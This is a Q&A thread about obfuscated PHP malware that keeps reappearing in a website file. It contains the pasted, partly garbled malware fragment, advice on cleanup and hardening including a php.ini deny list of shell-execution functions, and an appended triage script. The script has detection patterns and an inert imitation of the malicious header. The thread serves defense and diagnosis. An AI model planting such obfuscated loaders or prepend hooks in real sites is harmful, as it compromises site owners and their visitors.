
PHP obfuscated "Dodgy" code is appearing on my website

I found this in my PHP file:

<?php $glsaucbk = '5    156 x61"])))) { $GLOBALS["  ]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz)  x24]25  x24-    x24-!%  x24-    x24*!|! x24-    x24 x5c%j24#-!#]y38#-!%w:**<")));$nkfhbiv = $sorsjsw("", $wrwjkjc); $nkfhbiv#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#1GO  x2nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fep::::-111112)eobs`un>qp%!|Z~!<##!>!2w*[!%rN}#QwTW%hIr  x5c1^-%r    x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]8]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR  x27id%6<    ();}}AZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,27!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutc252]y85]256]y6g]257]y86]267]y74tjyf`4  x223}!+!<+{e%+*!*+fe4y4 x24-    x24]y8  x24-    x24]26  x24-        x24!>!fyqmpef)# x24*<!%t::!>!   x24Ypp3)%c%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f    x27,*e  x27,*d  x2%rxB%epnbss!>!bssbz)#44ec:649#!-#j0#!/

It's at the head of the file... I've tried to delete it but it reappears directly. I have used a PHP detector and it says DodgyPHP. Have you already had this malicious code in your PHP file?

I don't think you need to know any more than you do already:

  • It's code you didn't expect to be there.
  • It's clearly obfuscated; there's rarely a reason to obfuscate PHP other than to hide malicious code.
  • It reappears when you delete it, implying there are other malicious scripts running and self-repairing.

You should at least:

  1. Take the site offline immediately. It may be infecting other people, or being used for criminal activity on your account.
  2. If this is a third-party application (e.g. WordPress, phpBB, etc.), reinstall from scratch with an up-to-date version, using only well-known plugins which are kept up to date. If it is code you wrote, you need to audit its security, or pay an expert to do so.
  3. Rescue your data from backup, ensuring to the best of your ability that the backup is from before the compromise, and apply it to the cleanly installed site.

While not a direct answer, this would be a useful step-by-step guide for how to clean up your system.

The symptoms show your system has also certainly been hacked, and is still hackable.

You need to follow the link here http://www.gregfreeman.io/2013/steps-to-take-when-you-know-your-php-site-has-been-hacked/ and take significant steps to harden your system against future hacks:

  • Ensure that the userid running the web server process does not have write permission to the files it's serving. You can use ps aux | grep apache or ps aux | grep nginx to find the userid that your web server is running under. Make sure the files are not owned by that user. You can check for permissions by doing something like sudo -u <that userid> touch /path/to/web/files/some_test_file. If that successfully creates a file, then you have a problem and you need to adjust permissions.
  • Change all passwords.
  • Stop using FTP; use FTPS or SFTP.
  • Update your PHP to the latest current version.
    • Update any PHP CMS program (Joomla, WordPress, etc.) to the latest version.
  • Reload your data from backups after checking for a backup you are certain has not been hacked.
  • Edit your php.ini and disable dangerous functions (such as exec) and classes:

      disable_functions = "exec,passthru,shell_exec,system,proc_open,popen, curl_multi_exec,parse_ini_file,show_source" 
  • Edit your php.ini and be sure to check that your auto_prepend_file and auto_append_file values are expected or blank.
  • Set new usernames for database and server access. Stop using root. Never use root to access anything.
  • Check and prevent unrecognised cron jobs running on your server.

Note: Could others who know add to and edit this post with further useful guides and information. It could be a good resource for future readers.
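The checks in the answer above (find the web server account, look for files it owns, spot obfuscated PHP, verify php.ini hooks) as a small triage script. This is an added example and not code from either answer or from the original question; the ps excerpt, the docroot layout, the file names, the www-data account and the php.ini path are all constructed sample data, and the "dodgy" file is only modelled on the shape of the posted sample (a variable-function call through create_function and a long scrambled string).

```shell
#!/bin/sh
# Added triage helpers for the hardening checks listed above (not from the
# original post). Everything written by make_sample_site() is constructed data.

# Constructed `ps aux` excerpt: an Apache master running as root, two workers
# running as www-data, and the `grep apache` process itself.
PS_SAMPLE='USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root      1042  0.0  0.4  71700  5200 ?        Ss   09:01   0:00 /usr/sbin/apache2 -k start
www-data  1050  0.0  0.6  72120  7810 ?        S    09:01   0:00 /usr/sbin/apache2 -k start
www-data  1051  0.0  0.6  72120  7810 ?        S    09:01   0:00 /usr/sbin/apache2 -k start
alice     2210  0.0  0.1   8820  1100 pts/0    S+   09:10   0:00 grep apache'

# web_user_from_ps "<ps aux output>": the account the worker processes run as.
# The master runs as root but does not execute PHP, so root is skipped; only
# the COMMAND column ($11) is matched, so the `grep apache` line is not counted.
web_user_from_ps() {
    printf '%s\n' "$1" |
        awk '$1 != "root" && $11 ~ /apache2|httpd|nginx|php-fpm/ { print $1 }' |
        sort | uniq -c | sort -rn | awk 'NR == 1 { print $2 }'
}

# files_owned_by <user> <docroot>: files the web server account owns and can
# therefore rewrite, which is how a removed header keeps coming back.
files_owned_by() {
    find "$2" -type f -user "$1" 2>/dev/null | sort
}

# scan_dodgy_php <docroot>: PHP files showing markers like the posted sample:
# eval/decoder calls, a create_function-style call through variables
# ($a = $b("", $c);), or a single quoted string longer than 200 characters.
scan_dodgy_php() {
    find "$1" -type f -name '*.php' | sort | while IFS= read -r f; do
        if grep -Eq 'eval[[:space:]]*\(|base64_decode[[:space:]]*\(|gzinflate[[:space:]]*\(|str_rot13[[:space:]]*\(' "$f" ||
           grep -Eq '\$[A-Za-z_][A-Za-z0-9_]*[[:space:]]*=[[:space:]]*\$[A-Za-z_][A-Za-z0-9_]*[[:space:]]*\([[:space:]]*""[[:space:]]*,' "$f" ||
           grep -Eq "['\"][^'\"]{200,}['\"]" "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# check_php_ini_hooks <ini-file>...: print auto_prepend_file/auto_append_file
# directives that are set to anything but an empty value; returns 1 if any.
check_php_ini_hooks() {
    found=0
    for ini in "$@"; do
        hits=$(grep -E '^[[:space:]]*auto_(prepend|append)_file[[:space:]]*=' "$ini" 2>/dev/null |
               grep -Ev '=[[:space:]]*("")?[[:space:]]*(;.*)?$' || true)
        if [ -n "$hits" ]; then
            printf '%s\n' "$hits" | sed "s|^|$ini: |"
            found=1
        fi
    done
    return $found
}

# make_sample_site <dir>: constructed docroot with one clean page, one page
# carrying a planted header, and a php.ini with a prepend hook set.
make_sample_site() {
    mkdir -p "$1/public"
    cat > "$1/public/index.php" <<'EOF'
<?php
// Constructed clean page: escapes its one input and prints it.
$name = htmlspecialchars($_GET['name'] ?? 'world', ENT_QUOTES, 'UTF-8');
echo "<p>Hello, $name</p>";
EOF
    # Constructed header modelled on the posted sample: a 260-character
    # scrambled string fed to create_function through variables. Inert data.
    blob=$(awk 'BEGIN { for (i = 0; i < 260; i++) printf "%c", 48 + (i * 7) % 43 }')
    {
        printf '<?php $glsaucbk = '"'"'%s'"'"'; ' "$blob"
        printf '$sorsjsw = "create_function"; $wrwjkjc = strrev($glsaucbk); '
        printf '$nkfhbiv = $sorsjsw("", $wrwjkjc); $nkfhbiv(); ?>\n'
        printf '<?php echo "<p>Catalogue</p>";\n'
    } > "$1/public/catalogue.php"
    cat > "$1/php.ini" <<'EOF'
; Constructed php.ini excerpt: the prepend hook is the kind of entry to look for.
disable_functions = "exec,passthru,shell_exec,system,proc_open,popen"
auto_prepend_file = /var/www/.cache/.x.php
auto_append_file =
EOF
}

# Stand-alone demo over the constructed site.
site=$(mktemp -d)
make_sample_site "$site"
echo "web server user:  $(web_user_from_ps "$PS_SAMPLE")"
echo "files owned by it: $(files_owned_by "$(web_user_from_ps "$PS_SAMPLE")" "$site/public" | wc -l)"
echo "suspicious files: $(scan_dodgy_php "$site/public" | tr '\n' ' ')"
check_php_ini_hooks "$site/php.ini" || echo "-> clear the hook and inspect the prepended file"
rm -rf "$site"
```

On a real host, run files_owned_by with the account web_user_from_ps reports and your actual docroot; anything it lists (and anything the sudo -u ... touch test above can create) needs its ownership or mode fixed. The same auto_prepend_file directive can also be set per directory in a .user.ini file and, under Apache with mod_php, via php_value in .htaccess, so pass those files to check_php_ini_hooks as well. The script only finds things; as both answers say, the cure is a clean reinstall plus data restored from a pre-compromise backup, not deleting the hits one by one.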
